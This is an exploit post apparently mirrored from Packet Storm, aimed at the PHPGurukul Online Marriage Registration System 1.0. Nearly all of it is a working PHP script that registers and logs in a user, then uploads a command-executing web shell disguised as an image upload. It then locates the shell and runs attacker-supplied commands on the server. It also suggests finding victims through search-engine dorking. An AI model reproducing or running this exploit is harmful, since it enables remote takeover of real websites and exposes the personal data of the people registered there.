Share
## https://sploitus.com/exploit?id=PACKETSTORM:181416
=============================================================================================================================================  
| # Title : Online Marriage Registration System 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This payload inject php code contains a back door.  
  
[+] Line 16 + 19 Set your Target.  
  
[+] save payload as poc.php  
  
[+] usage from cmd : C:\www\test>php 1.php -u http://127.0.0.1/omrs/ -c dir  
  
[+] payload :  
  
<?php  
// Parse command line arguments  
$options = getopt("u:c:m:p:");  
$url = $options['u'] ?? null;  
$command = $options['c'] ?? null;  
$mobile = $options['m'] ?? null;  
$password = $options['p'] ?? 'inouvis2022';  
  
if (!$url || !$command) {  
die("Usage: php script.php -u <url> -c <command> \n");  
}  
  
function login($url, $mobile, $password) {  
$loginUrl = "{$url}/user/login.php";  
  
$ch = curl_init($loginUrl);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([  
'mobno' => $mobile,  
'password' => $password,  
'login' => ''  
]));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_HEADER, true);  
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');  
curl_exec($ch);  
curl_close($ch);  
  
// Extract PHPSESSID from cookie file  
$cookies = file_get_contents('cookie.txt');  
preg_match('/PHPSESSID=(\w+);/', $cookies, $matches);  
return $matches[1] ?? null;  
}  
  
function upload($url, $cookie) {  
$uploadUrl = "{$url}/user/marriage-reg-form.php";  
  
$fileData = [  
'husimage' => curl_file_create('shell.php', 'application/x-php', '<?php $command = shell_exec($_REQUEST["cmd"]); echo $command; ?>'),  
'wifeimage' => curl_file_create('test.jpg', 'image/jpeg')  
];  
  
$ch = curl_init($uploadUrl);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $fileData);  
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_exec($ch);  
curl_close($ch);  
  
echo "[+] PHP shell uploaded\n";  
}  
  
function getRemotePhpFiles($url) {  
$filesUrl = "{$url}/";  
$ch = curl_init($filesUrl);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
$response = curl_exec($ch);  
curl_close($ch);  
  
preg_match_all('/\d{10,42}\.php/', $response, $matches);  
return $matches[0];  
}  
  
function execCommand($url, $webshell, $command) {  
$commandUrl = "{$url}/user/{$webshell}?cmd=" . urlencode($command);  
$ch = curl_init($commandUrl);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
$output = curl_exec($ch);  
curl_close($ch);  
  
echo "[+] Command output\n" . $output . "\n";  
}  
  
function register($mobile, $password, $url) {  
$signupUrl = "{$url}/user/signup.php";  
  
$ch = curl_init($signupUrl);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([  
'fname' => 'indoushka',  
'lname' => 'indoushka',  
'mobno' => $mobile,  
'address' => 'indoushka',  
'password' => $password,  
'submit' => ''  
]));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_exec($ch);  
curl_close($ch);  
  
echo "[+] Registered with mobile phone $mobile and password '$password'\n";  
}  
  
$mobile = $mobile ?? strval(rand(100000000, 999999999));  
$password = $password ?? 'inouvis-2022';  
  
if ($password === 'inouvis-2022' || $mobile === null) {  
register($mobile, $password, $url);  
}  
  
$cookie = login($url, $mobile, $password);  
$initialPhpFiles = getRemotePhpFiles($url);  
upload($url, $cookie);  
$finalPhpFiles = getRemotePhpFiles($url);  
$webshell = array_diff($finalPhpFiles, $initialPhpFiles)[0];  
execCommand($url, $webshell, $command);  
?>  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================